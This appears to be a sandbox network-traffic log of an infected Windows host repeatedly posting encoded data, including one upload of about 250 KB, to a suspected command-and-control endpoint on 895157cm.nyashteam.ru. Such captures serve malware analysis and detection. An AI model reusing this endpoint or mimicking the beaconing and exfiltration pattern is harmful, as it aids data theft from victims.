Dec 21, 2024 11:07:37.819741011 CET	807	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=smiE7Doxe1hW96x0W%2BdBbcRkQqt%2FHOK4TdlRb96pOJUW%2BvBH7XszmZWzg0weZo5Nh6BID5J2beTwQeexLS16R9x6PA19Qs7ktQ8KvkhB64Qdv0AomTOBCt7XaIfGq6GL0eLyHAt0WZA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710f2daea0f8d-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4127&min_rtt=1644&rtt_var=5584&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=67859&cwnd=176&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:38.431241989 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:38.775192976 CET	2292	OUT	Data Raw: 59 5d 43 53 5f 5d 50 58 54 5d 59 5a 55 5d 57 56 56 5e 5c 55 52 52 5b 5f 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y]CS_]PXT]YZU]WVV^\URR[_YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!)-++.@<<5]&8P)+>?<<"8 1'[$.Y!7
Dec 21, 2024 11:07:39.517544031 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:39.757760048 CET	815	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SuovHaQk61mQFtWn9j7loliYwi7P4qXBzBR4SCdz%2B2XdFe3fTGx%2FcM%2FoNFn%2FZ7UU%2F8WrjRI5%2FLi60kEv2us88l%2Bwi5pwKVsHNHpUO0Okd4C3ELHoYPskWMgRoAvjWXXQ80mG8npnJPg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5710fefca78c21-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3982&min_rtt=1965&rtt_var=4771&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=80649&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:40.247718096 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:40.603425026 CET	2292	OUT	Data Raw: 59 5a 43 5b 5a 59 55 5e 54 5d 59 5a 55 5f 57 54 56 59 5c 5b 52 56 5b 56 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YZC[ZYU^T]YZU_WTVY\[RV[VYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!D>-&^?,8V+.,+<%5Q>9?Z+-2(V +]<\6'&-'[$.Y!
Dec 21, 2024 11:07:41.339864969 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:41.585443974 CET	809	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RSmfjNFo55212boV6pAluj5au3FIV43xcJYgu48d3H16r%2F9eTIbUrscjnxcg10OpSHuv9H8zDcs3dtsymDxYE1y4yg%2Fr985mz9b%2FyzcdKuJrjTG42VUt2NknUHe9EWs%2FtZkkIc323m4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57110a5f5241d2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4358&min_rtt=1627&rtt_var=6073&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=62177&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:41.872383118 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:42.228346109 CET	2292	OUT	Data Raw: 59 58 43 5a 5f 59 50 5f 54 5d 59 5a 55 5b 57 53 56 50 5c 5b 52 50 5b 5f 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YXCZ_YP_T]YZU[WSVP\[RP[_YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!B>&\>,#(>/)<51&)*Z(=P? </"32'[$.Y!/
Dec 21, 2024 11:07:42.957850933 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:43.196751118 CET	809	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jBVLadDEk63i4gHB%2FAo6cWm1mcSPDuzF4yAiF6I72l5sUl4PUzi1ZYRGSC5JN%2BM0VK%2B35nAjUM4%2FAe9GQWti5QZwTFBL6tOL7kwC8VrYZDwkPn3Vij1IgGe8tGjbBeOH43NCBOBsf4%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5711147ded0f37-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3185&min_rtt=1538&rtt_var=3870&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=99225&cwnd=138&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:43.608218908 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 1732 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:43.962712049 CET	1732	OUT	Data Raw: 59 52 43 59 5f 5d 55 5e 54 5d 59 5a 55 5a 57 51 56 5f 5c 5d 52 56 5b 56 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YRCY_]U^T]YZUZWQV_\]RV[VYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!)=><((>+/1%"));Z<>* 7+] "+81'[$.Y!+
Dec 21, 2024 11:07:44.694237947 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:44.935355902 CET	955	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MPnOKlNQw3wnDDxobEZUO70PFFutELAAFaB2vXstk0N5g8l18skzeUDcoY1sUEhd4TSSkheYgW7zLxVzYAgZZP%2FpjoyvC4iq6z2jFkP0KYIGUpr%2Bq1y6r1ei5LyomjWj8Id7jVXLAXY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57111f5cf580dc-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3010&min_rtt=1600&rtt_var=3420&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2035&delivery_rate=113345&cwnd=146&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0f 13 3a 02 26 2b 2a 59 2a 29 09 5f 28 2c 00 0d 3c 05 22 5d 2c 22 0b 5c 25 30 3c 5f 2c 02 3a 09 3f 0a 31 5a 3f 03 02 54 3c 19 27 11 2a 02 2e 58 03 11 24 13 21 14 0d 1d 28 3b 31 1d 3a 01 21 5a 20 2d 06 04 2e 16 3d 50 25 10 39 0e 36 5c 2f 56 3b 08 23 0c 2d 29 33 14 26 51 33 57 31 04 2e 53 0c 16 22 58 29 13 3d 58 31 11 2a 0f 30 27 07 0a 36 25 28 1b 36 38 38 57 25 3c 08 58 26 3e 24 54 29 20 00 0c 2b 59 32 40 3f 04 00 0b 28 2b 26 55 2e 01 22 53 04 3d 5a 50 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:&+Y)_(,<"],"\%0<_,:?1Z?T<'.X$!(;1:!Z -.=P%96\/V;#-)3&Q3W1.S"X)=X10'6%(688W%<X&>$T) +Y2@?(+&U."S=ZP0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:43.757149935 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:44.103436947 CET	2292	OUT	Data Raw: 59 5a 46 5c 5a 5b 50 5f 54 5d 59 5a 55 5b 57 5f 56 5b 5c 5f 52 51 5b 58 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YZF\Z[P_T]YZU[W_V[\_RQ[XYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!@X+,+>>@)/=Y28>)^)-%P*#3?( ^#+$%='[$.Y!/
Dec 21, 2024 11:07:44.853640079 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:45.091305971 CET	813	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7SOSrOhFg0LJbGfQmba5w%2BsYFeWCPjBQngPMJys9Zq3jKtmWgTbfpQl%2FI3Y566dob3xw7ElfDJKQDPxJEWT0yuXiG%2FIWOi6mG46vFzG3Ky4cHIc%2FS0mLXCyta9%2FCAtXrXJju%2Bh6jg5o%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f5711204b558cda-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=5768&min_rtt=1951&rtt_var=8366&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2595&delivery_rate=44939&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:45.346657038 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2292 Expect: 100-continue
Dec 21, 2024 11:07:45.697122097 CET	2292	OUT	Data Raw: 5c 5c 43 5b 5f 5d 50 5f 54 5d 59 5a 55 50 57 5e 56 5a 5c 5e 52 51 5b 56 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: \\C[_]P_T]YZUPW^VZ\^RQ[VYRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!=[!?<??-#D+/-&8=P>)$).9T?0++,6842'[$.Y!
Dec 21, 2024 11:07:46.432185888 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:46.669989109 CET	812	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JGZr%2BpPXc6Ef9jzunThpKIM4%2Buvx%2BRypR0WcPkv2pDQl9uDfL453anxNwh0dSKcPe%2BUI6rqsoUZO7SF3bFxJBlbE3%2FU42XDeg9Z0tL1AWyTRqIRrqtKYSQ1VZfY8p7C30kGexjgHusY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f57112a3d6c7cfa-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=8718&min_rtt=1906&rtt_var=14339&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2571&delivery_rate=25885&cwnd=188&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:46.908142090 CET	303	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 2288 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:47.259641886 CET	2288	OUT	Data Raw: 59 58 43 5b 5f 5c 50 5b 54 5d 59 5a 55 58 57 52 56 50 5c 5d 52 50 5b 5b 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: YXC[_\P[T]YZUXWRVP\]RP[[YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!>*^<<.?<$;"=0).=U?++"#U2='[$.Y!3

Timestamp	Bytes transferred	Direction	Data
Dec 21, 2024 11:07:47.555655003 CET	305	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 249736 Expect: 100-continue Connection: Keep-Alive
Dec 21, 2024 11:07:47.900326014 CET	12360	OUT	Data Raw: 59 5f 46 58 5a 57 50 52 54 5d 59 5a 55 51 57 51 56 5d 5c 59 52 5e 5b 5d 59 52 42 5c 52 5d 5f 59 42 52 5b 5f 53 58 5a 5c 42 56 50 5d 57 5f 54 5e 50 59 5e 5f 5a 5f 55 5e 55 59 57 52 55 5d 5f 57 5e 5c 59 5a 55 5d 57 51 5e 5b 5c 52 5c 5b 5c 57 57 54 Data Ascii: Y_FXZWPRT]YZUQWQV]\YR^[]YRB\R]_YBR[_SXZ\BVP]W_T^PY^_Z_U^UYWRU]_W^\YZU]WQ^[\R\[\WWTZQQXU\[VUPXXQQZZX\TY[[[]_QYS\U\DSP\^^RYQXXZ^_WUR_PV\X@G\ZVP]YVTZ[_QS\\^^][_BT[B]_X__ZQP\[TQXTQZXYP\^^\!B>6<,W<.E)/6%+9>X+>( 3?;<_"^<'='[$.Y!
Dec 21, 2024 11:07:48.020412922 CET	2472	OUT	Data Raw: 0c 2e 29 1f 0c 29 23 57 2f 1c 50 12 3b 5d 53 1b 32 36 02 53 24 38 2e 12 0d 2c 18 12 34 2c 22 19 3e 23 00 33 25 36 21 10 35 1c 15 0b 0c 16 37 2b 39 03 3a 58 27 29 1d 29 07 32 36 22 01 33 1b 3c 3a 5f 39 19 32 04 3d 0f 36 02 00 3e 3b 0b 3c 3f 3e 58 Data Ascii: .))#W/P;]S26S$8.,4,">#3%6!57+9:X'))26"3<:_92=6>;<?>X$>^+(&0"V6*QR0Y;'-&B?=.(Y/U%:1];[(2107"#\8$2)<'=/0)&Y89]%!<;X)_>+81+<"5%<._38?>) ]?.?4$R!054T6\^[:6
Dec 21, 2024 11:07:48.020463943 CET	2472	OUT	Data Raw: 3c 23 34 32 0f 2a 06 20 32 24 52 3c 3b 0a 3a 14 24 32 26 2f 33 39 0b 03 29 17 24 3d 04 2d 10 1c 04 04 35 1d 00 0b 1c 24 30 20 23 3f 34 3c 26 16 12 22 0f 12 32 05 2f 1e 3c 52 24 09 00 05 2a 14 29 2f 27 19 0f 04 0a 1d 02 01 36 17 34 00 3e 03 08 31 Data Ascii: <#42* 2$R<;:$2&/39)$=-5$0 #?4<&"2/<R$)/'64>1((7]/W"<.."%;5=+<5%5R[=\'=.6'$-#>^V,1;=;U4#+?.A(:")52-"$7$.^"5>S>;6!=<.(+S/=<.!',3/.(+0')&(Z])9,<&+2?7(\"/K
Dec 21, 2024 11:07:48.020564079 CET	2472	OUT	Data Raw: 0b 3e 1e 34 39 1c 04 52 26 3b 1c 3a 23 33 27 10 07 01 22 0a 30 28 21 0d 0a 59 24 04 3b 06 3a 36 3b 5a 22 43 07 58 17 3e 22 2c 2f 28 3c 00 24 1e 35 2f 0b 1a 39 38 2a 28 30 04 09 5f 07 2d 2e 3c 07 3c 09 54 30 29 09 39 38 01 4b 34 3b 2d 1a 2b 3c 2d Data Ascii: >49R&;:#3'"0(!Y$;:6;Z"CX>",/(<$5/98(0_-.<<T0)98K4;-+<-#Y46:=4R\#_3&0U==X<)!%580Z>(^/V!?#8Z6Y "?<;0+6($5Z281926-7X/^5"/#";_#4'15$+& U(56%][0.9%->>&6'</T<&=/'46Y.+Y
Dec 21, 2024 11:07:48.020591021 CET	2472	OUT	Data Raw: 3a 2d 06 28 2e 3b 1c 56 09 3f 5a 35 22 03 09 1d 03 1f 05 11 3b 3a 56 1e 26 08 5f 24 09 28 35 26 3b 5f 31 05 31 3d 0f 1a 27 2f 35 11 3f 0d 04 57 3c 1f 2f 11 0c 3b 37 13 30 5b 03 32 0c 07 20 53 34 0e 36 0c 28 2e 13 2a 26 38 39 57 07 05 07 36 29 3e Data Ascii: :-(.;V?Z5";:V&_$(5&;_11='/5?W</;70[2 S46(.&89W6)>26088#.41%)T;"?(6+U="3>"<[Y.>#!8Z-$62<&(>!9_$+2++<T29,]'^ ):+82X1@>28[;](191,9[2\$()[7XP0*2$3#,XX >;1S">2-$
Dec 21, 2024 11:07:48.020652056 CET	2472	OUT	Data Raw: 0a 3c 37 1a 2c 43 10 58 32 3c 2c 1e 39 01 02 3e 33 24 2d 5b 3f 21 2e 03 21 59 14 27 33 5e 36 5b 28 3a 1e 38 04 2f 10 57 00 05 2a 14 2f 31 59 37 38 54 3b 1e 2c 20 04 09 20 0b 32 23 32 3d 01 26 20 34 15 1e 3e 3e 29 1c 37 59 01 31 27 5d 09 10 07 5e Data Ascii: <7,CX2<,9>3$-[?!.!Y'3^6[(:8/W/1Y78T;, 2#2=& 4>>)7Y1']^5&>Y]''<R9(6;:, :U3<R6<Y=X>%$=#!CV8#'2Z>$U3<>(&-X.528,<+"A>'#0S(!$=T'?<!=\/#[4"3.:Y(1.1=7(84>"1+
Dec 21, 2024 11:07:48.020762920 CET	4944	OUT	Data Raw: 29 04 0c 5f 03 26 53 5b 3e 5b 5a 5c 3a 36 56 11 26 34 1c 2c 22 30 3f 10 28 5c 18 53 36 5f 29 11 0d 3f 20 2f 35 3c 0f 17 15 3c 26 3a 2a 31 36 5f 10 05 3f 29 22 32 3f 45 28 12 3e 03 3a 01 54 55 05 5e 02 5d 33 2e 03 1d 06 22 0d 34 06 02 0a 14 22 3b Data Ascii: )_&S[>[Z\:6V&4,"0?(\S6_)? /5<<&:16_?)"2?E(>:TU^]3."4";Q;+.'X4Y(Q%+Z06:3/&9>Z"38SY=(0/6 )>.[!WHX/Z&6%U[?+6=,*0Z_29:4;UT69[!9+'>=6(U714_ 2%/+!.Z!5>:<Y2!P-(V:$7>)Z83T4U
Dec 21, 2024 11:07:48.020925045 CET	4944	OUT	Data Raw: 3b 07 16 22 23 5d 37 5e 3e 00 37 36 36 40 29 5d 26 3d 34 12 0f 07 3c 2f 00 1f 3d 04 33 0a 3a 26 0f 29 49 19 27 3a 56 1f 33 03 06 26 3f 04 14 2d 01 2d 39 5c 2a 56 39 5c 21 56 2b 3c 33 04 36 09 3e 32 3a 02 36 04 2c 57 22 27 0a 03 32 11 2a 1c 32 2f Data Ascii: ;"#]7^>766@)]&=4</=3:&)I':V3&?--9\V9\!V+<36>2:6,W"'22/\(=^,$0;Q:;,7_T<,W!:<">)]>=$<%94>Y<36R%+%"8S#^P3Z/"<32=F(^06-"8!1[ !)1/"6Z?92$(+?Z[9=7*;<=\"(3C<>0:<
Dec 21, 2024 11:07:48.086055994 CET	2472	OUT	Data Raw: 03 3e 3b 12 35 3b 5f 1f 04 39 2a 34 02 2a 08 18 0e 13 28 07 00 28 00 17 3b 2d 39 30 0d 05 38 14 3b 09 0d 1e 38 17 28 3a 27 24 33 1e 3d 3b 29 08 0d 04 3e 1e 03 2c 00 3a 0c 01 29 1e 09 24 1b 2b 0d 1f 23 2e 20 2b 2b 39 25 3d 1b 1f 08 3c 3b 07 03 0a Data Ascii: >;5;_94((;-908;8(:'$3=;)>,:)$+#. ++9%=<;U>>)663=4>;2]2/ !A!:#!/54W3?89->61 ''%";(&Y>"2Z)2&60_'9)(R<#(^=C%/$$],^76:W-_'(<]2[6;?]#6?8"734[2,-T< &
Dec 21, 2024 11:07:48.140773058 CET	4944	OUT	Data Raw: 01 31 0d 3c 01 5f 2b 22 3f 5e 20 17 3c 5e 37 5d 3e 01 01 2b 31 0b 22 06 0a 5a 34 0e 24 5f 0e 0d 06 39 03 5d 0b 32 18 1c 27 5b 3e 3e 3f 28 1b 1e 35 06 5b 5b 33 30 32 25 34 02 2d 14 37 33 0c 2b 0b 0e 49 13 2c 03 2a 12 13 1d 00 13 29 5b 05 2c 12 35 Data Ascii: 1<_+"?^ <^7]>+1"Z4$_9]2'[>>?(5[[302%4-73+I,)[,5\)!4U8\2!4+Y%<?04/]<9W=?U32\,Y1_!&820<Q1209+#5/Q";==&??1&0,+:!R+V)=?83>9?']))\"1X(Y<3>.:)2,*_=#V"<<X
Dec 21, 2024 11:07:48.640239000 CET	25	IN	HTTP/1.1 100 Continue
Dec 21, 2024 11:07:50.396559000 CET	809	IN	HTTP/1.1 200 OK Date: Sat, 21 Dec 2024 10:07:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wtHWUr0prmWXGfvJPgppPGEFg1RP1VwhDjr8BO89jJiFlNzfAVFYRVXql23oaOkTu6PXO9sFQiO0h6fjr6yWY0GMUwBj6kbIVdpV3xItN729q1pKw5PGlmPDZ1duHcIJFD3%2BMFxZfSs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f571137f97743dc-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3035&min_rtt=1577&rtt_var=3509&sent=88&recv=256&lost=0&retrans=0&sent_bytes=25&recv_bytes=250041&delivery_rate=110213&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3d 5b 40 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4=[@W0
Dec 21, 2024 11:07:50.397170067 CET	279	OUT	POST /videogeoflowertestuniversaldleLocalCentral.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 895157cm.nyashteam.ru Content-Length: 1732 Expect: 100-continue
Dec 21, 2024 11:07:50.711101055 CET	25	IN	HTTP/1.1 100 Continue
